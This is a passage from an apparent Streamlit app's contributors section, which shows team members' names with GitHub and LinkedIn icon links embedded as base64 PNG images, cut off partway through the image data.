Gq0/T3NJmWnSegWf0mhTGvZ/vmN6oSsJKnMPhPk6x9DU+QpxRy7craI76mlrajhfRe1wqXyCkLdBHhEE0gxJ8K6hREYskLQPzrj4MAmL7p5FO/qUpgbmKmKJJKOurE7aJIzN4HQoP6PeJ6Tbt3d/QGWGAlgx/6OAgQ8bmFbOaRanvNmDevqXfvgW55bN8QAqGiN8W/iA9fHI0nTmamqmadaFJC0tLuztRz1XDLqdRP8/uGuBB5RizoIt0US8wXRFsnWthqeJLocz3ZlPbzEYqck4yxx7lBFzItu5OA2Tp4JLUVOlNbqgu5zDBjb+8hoqmTSoLR5eRnzaxWSGo3b0ksgqSXdAgw54emUaJlbjblp6gRcpqW/SgBKyaTADMecfPpwFrLjCfOJqaNWgZJz5AZT95FzN8pM7rLzWcuDxKw7EYdAMTkkGBPkjg2yH3UnqZlryXg0rK8d1I0Zq9gwqPahYBXC7n0kObVcEFNy76bgEsmgwATrXWzKV0VBH2R2ILXQGKeJkC8nJpKeVX1I1VlKgFvhpPr6AqGWGZErV3rGVg2kSQI+H0hN+vrQb6vtT970SfJKKozQHkAsxeaqcvpSMxOD3bFmK528qk1NYRTsbMK4Fv2N6iZ+QOAfuDm06oHpXpAwdq3EtcC9FOtffAWN5dp0wSiln0JA3eXBrDTzaVj/h3XbE6cyIJuM0Ad0jNudHe8vMffQbc+mkLLQfgqwMcDmF6nVd4D8QuQeMrpC23EO5v7aq9bZkSsXaqJMKtMYLWby9xTskCLfYj0sGuwpUd0ekVPUl2+lUWuAONdAXlcd759Z7UNq3QQhk3jvYLo+NHK5SAiZjx5FjE/psZVF9sIG4erds9Hl3rLVq2KK8pW6HT7G4/G25v2+oCmlbyOwDcC/JrT37SwcsyfU899mcAbCrnMmFKxsnR3k3hTEB1R2otud3Kpq/RP/uYj2yojOgQiEluwVWUAHXD9jecPIVFqiu0hYMpo7qC01xP1Dq63/689xErcCtD3tXKD2irlYK5obGGfELS4e3tK5X39mbHEGUTk3xd2gbEBoC6GPIyITgJwVG1fBooeH963I/PveuZGrQU2s3jRLzgBVG9saTClRVdsGey/MO8uskj2dabeKW8mIs2JP0PQF+rZPGgOSzrK7Uxtq4UxZc6iWZ5XVKXNzJL2a7QW1aTo7LZmaRQ7CBQt+9irDRQ+wX+BmRZfHOnn/nUMOqeWAPtDQFed4Qal+c+W47LbkF7r8HZm9fZ6PPk1sHzCvz6qE3pA0qkVlsBBza2zPTK+BMJMARS4FE+310OqlgW05ovFp3zhwVwE4wynM/PH4fj1P3CA/+NJPrW3s71qSa1SKAka2ggOYDMagajufJB6B9Buo48mwredbPpX1eBqPTGdD+YHQBQqQ6mXwzucgcYbhqfR/Sbw6bZPRBu9axi4ttz30Q8bzOJiN59Sp3TVr/YjX3zhaczew35MlIIJWQKucvLppytO7PFaQB2UpzGwxr+X+D5PkldWc5tKJjUJDAa2GNjg9yV9AHWhEELcUxTFjYYX+gbAt9YTAyoVeoa33vCMFQysJuDIynUq2xjMy+t5f6iLgAZfsiQUfbdvtWR5U6U16hS4rmm6RCCsKYTcW7FtW389i+onUEbT5beHK1nSRf5jSD0bjTZHtcuJ6H4ZkmvG+g8gYybgC6Ler7z+fecAtJIYC8fxfxfM4BQgfidCYv143+HGTaBSo2bzMdNhhJeQh4UQaGHWTYJp2kIMYrAL0HtE+CeAt5h4C4rhTZWl+Xit+H+mCGntW0TDWgAAAABJRU5ErkJggg==)](https://github.com/mertturkyilmaz)") with col4: st.markdown("<b><i>Sarper Yılmaz</i></b>", unsafe_allow_html=True) st.markdown("[![Foo](data:image/png;base64,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)](https://www.linkedin.com/in/sarperyilmaz/)") st.markdown("[![Foo](data:image/png;base64,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)](https://github.com/sarperyilmaz)") with col7: st.markdown("<b><i>Doğukan Doğru</i></b>", unsafe_allow_html=True) st.markdown("[![Foo](data:image/png;base64,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